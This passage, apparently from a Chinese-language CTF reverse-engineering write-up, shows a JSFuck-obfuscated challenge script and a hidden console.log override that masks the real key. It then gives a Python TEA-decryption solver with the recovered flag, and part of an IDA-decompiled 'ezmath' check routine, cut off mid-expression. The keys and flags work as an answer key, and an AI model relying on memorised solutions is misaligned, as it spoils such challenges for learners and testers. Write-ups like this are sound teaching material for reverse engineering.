[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]])[(![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]]((!![]+[])[+[]])[([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]](([][(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]]+![]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])()[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])+[])[+!+[]])+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]])()) </code></pre> <p>在index里,整个流程是在div的包含里面,div可能是个混淆</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-068.png" alt="" /></p> <p>我们随便输入111,出现wrong flag,在日志里出现</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-069.png" alt="" /></p> <p>点进看到,对key进行了替换,真实的key是K0meji_K0ishi,而不是Komeji Satori</p> <pre><code>;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;___Key = 'K0meji_K0ishi'; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;___Key.toString = function() { return 'Komeji Satori'; } ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;var Ori = console.log; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;console.log = function(...args) { for (var i = 0; i &lt; args.length; i++) { if (args[i] == ___Key) { args[i] = 'Komeji Satori'; } } Ori(...args); } ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; </code></pre> <p>脚本</p> <pre><code>ans=[68,241,170,187,35,199,71,125,74,176,71,216,56,85,160,159,67,234,185,29,104,120,245,18] key='K0meji_K0ishi' kb=key.encode('utf-8') kb16=bytearray(16) for i in range(16): kb16[i]=kb[i%len(kb)] k=[((kb16[i*4]&lt;&lt;24)|(kb16[i*4+1]&lt;&lt;16)|(kb16[i*4+2]&lt;&lt;8)|kb16[i*4+3])&amp;0xffffffff for i in range(4)] DELTA=0x9e3779b9 def tea_dec(v0,v1,k): s=(DELTA*32)&amp;0xffffffff for _ in range(32): v1=(v1-((((((v0&lt;&lt;4)&amp;0xffffffff)+k[2])^((v0+s)&amp;0xffffffff)^(((v0&gt;&gt;5)+k[3])&amp;0xffffffff)))) )&amp;0xffffffff v0=(v0-((((((v1&lt;&lt;4)&amp;0xffffffff)+k[0])^((v1+s)&amp;0xffffffff)^(((v1&gt;&gt;5)+k[1])&amp;0xffffffff)))) )&amp;0xffffffff s=(s-DELTA)&amp;0xffffffff return v0&amp;0xffffffff,v1&amp;0xffffffff def decode(inp): L=((len(inp)+7)//8)*8 b=bytearray(L) b[:len(inp)]=inp for i in range(0,L,8): v0=((b[i]&lt;&lt;24)|(b[i+1]&lt;&lt;16)|(b[i+2]&lt;&lt;8)|b[i+3])&amp;0xffffffff v1=((b[i+4]&lt;&lt;24)|(b[i+5]&lt;&lt;16)|(b[i+6]&lt;&lt;8)|b[i+7])&amp;0xffffffff v0,v1=tea_dec(v0,v1,k) b[i]=(v0&gt;&gt;24)&amp;0xff; b[i+1]=(v0&gt;&gt;16)&amp;0xff; b[i+2]=(v0&gt;&gt;8)&amp;0xff; b[i+3]=v0&amp;0xff b[i+4]=(v1&gt;&gt;24)&amp;0xff; b[i+5]=(v1&gt;&gt;16)&amp;0xff; b[i+6]=(v1&gt;&gt;8)&amp;0xff; b[i+7]=v1&amp;0xff return bytes(b) kc=[ord(c) for c in key] enc=bytearray(len(ans)) for i,x in enumerate(ans): enc[i]=x^kc[i%len(kc)] pre=bytearray(decode(enc)) if len(pre)&gt;=4: pre[0]^=0x12; pre[1]^=0x34; pre[2]^=0x56; pre[3]^=0x78 end=len(pre) while end&gt;0 and pre[end-1]==0: end-=1 plain=bytes(pre[:end]) print(plain.decode('utf-8')) </code></pre> <p>flag{jS_1s_veRY_dYn4M1c}</p> <h1>5.ezmath</h1> <p>IDA打开,main函数如下,遇到这种线性计算,我们可以使用z3来约束计算</p> <pre><code>int __fastcall main(int argc, const char **argv, const char **envp) { char v4; // [rsp+68h] [rbp-58h] char v5; // [rsp+69h] [rbp-57h] char v6; // [rsp+6Ah] [rbp-56h] char v7; // [rsp+6Bh] [rbp-55h] char v8; // [rsp+6Ch] [rbp-54h] char v9; // [rsp+6Dh] [rbp-53h] char v10; // [rsp+6Eh] [rbp-52h] char v11; // [rsp+6Fh] [rbp-51h] char v12; // [rsp+70h] [rbp-50h] char v13; // [rsp+71h] [rbp-4Fh] char v14; // [rsp+72h] [rbp-4Eh] char v15; // [rsp+73h] [rbp-4Dh] char v16; // [rsp+74h] [rbp-4Ch] char v17; // [rsp+75h] [rbp-4Bh] char v18; // [rsp+76h] [rbp-4Ah] char v19; // [rsp+77h] [rbp-49h] char v20; // [rsp+78h] [rbp-48h] char v21; // [rsp+79h] [rbp-47h] char v22; // [rsp+7Ah] [rbp-46h] char v23; // [rsp+7Bh] [rbp-45h] char v24; // [rsp+7Ch] [rbp-44h] char v25; // [rsp+7Dh] [rbp-43h] char v26; // [rsp+7Eh] [rbp-42h] char v27; // [rsp+7Fh] [rbp-41h] char v28; // [rsp+80h] [rbp-40h] char v29; // [rsp+81h] [rbp-3Fh] char v30; // [rsp+82h] [rbp-3Eh] char v31; // [rsp+83h] [rbp-3Dh] char v32; // [rsp+84h] [rbp-3Ch] char v33; // [rsp+85h] [rbp-3Bh] char v34; // [rsp+86h] [rbp-3Ah] char v35; // [rsp+87h] [rbp-39h] char v36; // [rsp+88h] [rbp-38h] char v37; // [rsp+89h] [rbp-37h] char v38; // [rsp+8Ah] [rbp-36h] char v39; // [rsp+8Bh] [rbp-35h] char v40; // [rsp+8Ch] [rbp-34h] char v41; // [rsp+8Dh] [rbp-33h] char v42; // [rsp+8Eh] [rbp-32h] char v43; // [rsp+8Fh] [rbp-31h] char v44; // [rsp+90h] [rbp-30h] char v45; // [rsp+91h] [rbp-2Fh] char v46; // [rsp+92h] [rbp-2Eh] char v47; // [rsp+93h] [rbp-2Dh] char v48; // [rsp+94h] [rbp-2Ch] char v49; // [rsp+95h] [rbp-2Bh] char v50; // [rsp+96h] [rbp-2Ah] char v51; // [rsp+97h] [rbp-29h] char v52; // [rsp+98h] [rbp-28h] char v53; // [rsp+99h] [rbp-27h] char v54; // [rsp+9Ah] [rbp-26h] char v55; // [rsp+9Bh] [rbp-25h] char v56; // [rsp+9Ch] [rbp-24h] char v57; // [rsp+9Dh] [rbp-23h] char v58; // [rsp+9Eh] [rbp-22h] char v59; // [rsp+9Fh] [rbp-21h] char v60; // [rsp+A0h] [rbp-20h] char v61; // [rsp+A1h] [rbp-1Fh] char v62; // [rsp+A2h] [rbp-1Eh] char v63; // [rsp+A3h] [rbp-1Dh] char v64; // [rsp+A4h] [rbp-1Ch] char v65; // [rsp+A5h] [rbp-1Bh] char v66; // [rsp+A6h] [rbp-1Ah] char v67; // [rsp+A7h] [rbp-19h] char v68; // [rsp+A8h] [rbp-18h] char v69; // [rsp+A9h] [rbp-17h] char v70; // [rsp+AAh] [rbp-16h] char v71; // [rsp+ABh] [rbp-15h] char v72; // [rsp+ACh] [rbp-14h] char v73; // [rsp+ADh] [rbp-13h] char v74; // [rsp+AEh] [rbp-12h] char v75; // [rsp+AFh] [rbp-11h] char v76; // [rsp+B0h] [rbp-10h] char v77; // [rsp+B1h] [rbp-Fh] char v78; // [rsp+B2h] [rbp-Eh] char v79; // [rsp+B3h] [rbp-Dh] char v80; // [rsp+B4h] [rbp-Ch] char v81; // [rsp+B5h] [rbp-Bh] char v82; // [rsp+B6h] [rbp-Ah] char *s; // [rsp+B8h] [rbp-8h] if ( argc == 2 ) { s = (char *)argv[1]; if ( (unsigned int)strlen(s) == 80 ) { v82 = s[1]; v81 = s[2]; v80 = s[3]; v79 = s[4]; v78 = s[5]; v77 = s[6]; v76 = s[7]; v75 = s[8]; v74 = s[9]; v73 = s[10]; v72 = s[11]; v71 = s[12]; v70 = s[13]; v69 = s[14]; v68 = s[15]; v67 = s[16]; v66 = s[17]; v65 = s[18]; v64 = s[19]; v63 = s[20]; v62 = s[21]; v61 = s[22]; v60 = s[23]; v59 = s[24]; v58 = s[25]; v57 = s[26]; v56 = s[27]; v55 = s[28]; v54 = s[29]; v53 = s[30]; v52 = s[31]; v51 = s[32]; v50 = s[33]; v49 = s[34]; v48 = s[35]; v47 = s[36]; v46 = s[37]; v45 = s[38]; v44 = s[39]; v43 = s[40]; v42 = s[41]; v41 = s[42]; v40 = s[43]; v39 = s[44]; v38 = s[45]; v37 = s[46]; v36 = s[47]; v35 = s[48]; v34 = s[49]; v33 = s[50]; v32 = s[51]; v31 = s[52]; v30 = s[53]; v29 = s[54]; v28 = s[55]; v27 = s[56]; v26 = s[57]; v25 = s[58]; v24 = s[59]; v23 = s[60]; v22 = s[61]; v21 = s[62]; v20 = s[63]; v19 = s[64]; v18 = s[65]; v17 = s[66]; v16 = s[67]; v15 = s[68]; v14 = s[69]; v13 = s[70]; v12 = s[71]; v11 = s[72]; v10 = s[73]; v9 = s[74]; v8 = s[75]; v7 = s[76]; v6 = s[77]; v5 = s[78]; v4 = s[79]; if ( -13 * v32 == 118 &amp;&amp; 23 * v73 + 47 * *s + 111 * v32 == 51 &amp;&amp; 76 * v73 + 33 * v32 - 63 * v18 == 81 &amp;&amp; -86 * v73 - 25 * v41 + 71 * v18 + 102 * v32 == 18 &amp;&amp; 105 * v73 - 17 * v41 + 74 * v18 - 25 * v32 + v14 == 0x95 &amp;&amp; 40 * v32 + 104 * v41 + -89 * v75 + 113 * v73 + 107 * v14 - 122 * v18 == 75 &amp;&amp; 95 * (v78 + v75) + 54 * v73 + -97 * v37 + 24 * v41 + -62 * v18 + 121 * v32 - 72 * v14 == 0xFD &amp;&amp; -126 * v32 - 35 * v37 + 66 * v41 - 39 * v71 + 100 * v75 - 46 * v73 + 54 * v14 - 118 * v18 == 82 &amp;&amp; -56 * v18 + 75 * v30 + -33 * v32 + 110 * v37 + -43 * v41 + 100 * v71 + 12 * v73 - 16 * v75 - 112 * v14 == 0xAC &amp;&amp; 79 * v30 - 67 * v32 + 5 * v41 - 77 * v71 + -14 * v73 - 85 * v75 + 63 * v18 + 59 * v23 + 30 * v14 == 51 &amp;&amp; 63 * v57 + 114 * v71 + 103 * v75 - 33 * v73 + 87 * v37 - 72 * v41 + 104 * v32 - v23 + 39 * v18 == 38 &amp;&amp; 113 * v29 - 22 * v32 + -83 * v75 + 35 * v71 + 44 * v37 - 126 * v57 + 78 * v18 + 99 * v23 + 112 * v14 == 0xC0 &amp;&amp; 121 * v36 + 32 * v37 + -24 * v41 - 33 * v57 + -120 * v71 + 71 * v73 + -59 * v23 + 118 * v29 + 117 * v18 == 62 &amp;&amp; -75 * v73 - (v75 &lt;&lt; 6) + -123 * v41 + 75 * v71 + 54 * v29 + 39 * (v32 + v37) + 83 * v17 - 76 * v18 == 0x89 &amp;&amp; 116 * v75 + 119 * v43 + 36 * v37 + 74 * v41 + -115 * v32 + 31 * v36 + -125 * v17 - 26 * v30 + 117 * v14 == 86 &amp;&amp; 6 * v18 - 125 * v30 + 100 * v73 + 53 * v71 + 65 * v41 - 82 * v43 + -111 * v32 + 5 * v37 + 19 * v16 == 0x9D &amp;&amp; 13 * v18 + 29 * v23 + -91 * v32 - 45 * v40 + -10 * v41 - 82 * v43 + 117 * v75 - 92 * v57 + 10 * v14 == 0xB3 &amp;&amp; 83 * v17 - 65 * v23 + 73 * v32 + 57 * v37 + 44 * v40 - 81 * v43 + 13 * v73 - 49 * v74 - 48 * v14 == 0x8D &amp;&amp; -76 * v23 - 11 * v29 + 102 * v75 - 46 * v73 + 31 * v52 + 20 * v71 + 8 * v37 - 21 * v43 + 37 * v16 == 127 &amp;&amp; -75 * v32 - 89 * v40 + -6 * v52 - 67 * v57 + 82 * v73 - 117 * v58 + -12 * v23 - 8 * v30 + 55 * v17 == 0xFE &amp;&amp; 41 * v16 + 6 * v18 + 56 * v29 + 101 * v33 + -11 * v41 + 23 * v43 + 19 * v73 + 14 * v52 + 25 * v14 == 0xBF &amp;&amp; -82 * v37 - 33 * v55 + 77 * v74 - 60 * v73 + 8 * v58 + 52 * v71 + -118 * v33 + 78 * v36 + 39 * v16 == 0xD8 &amp;&amp; -119 * v37 - 4 * v41 + 103 * v75 - 101 * v73 + 62 * v43 + 117 * v47 + 53 * v16 + 36 * v32 + 65 * v14 == 86 &amp;&amp; 14 * v23 + 31 * v29 + 56 * v74 - 8 * v71 + -117 * v53 + 118 * v58 - v47 + 56 * v14 - 80 * v17 == 